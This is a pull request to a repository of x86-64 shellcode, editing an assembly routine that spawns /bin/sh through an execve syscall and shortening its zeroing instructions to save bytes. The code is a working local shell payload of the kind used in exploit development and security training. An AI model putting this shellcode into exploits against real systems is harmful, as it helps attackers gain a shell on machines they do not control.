### PR TITLE
change xor reg, reg to 32bit version

### DIFF
--- a/64BitLocalBinSh/shell64.s
+++ b/64BitLocalBinSh/shell64.s
@@ -8,13 +8,13 @@ BITS 64
 global main
 
 main:
-	xor  rax, rax
+	xor  eax, eax
 	push rax
 	mov  rdi, 0x68732f2f6e69622f ;/bin//sh
 	push rdi
 	mov  al,  execve
 	mov  rdi, rsp
-	xor  rsi, rsi
-	xor  rdx, rdx
+	xor  esi, esi
+	xor  edx, edx
 	syscall
 


### PR DESCRIPTION
the x86-64 instruction behaviour is to zero the upper 32bits for 32bit operands, so xor eax, eax = xor rax, rax, but 1 byte shorter.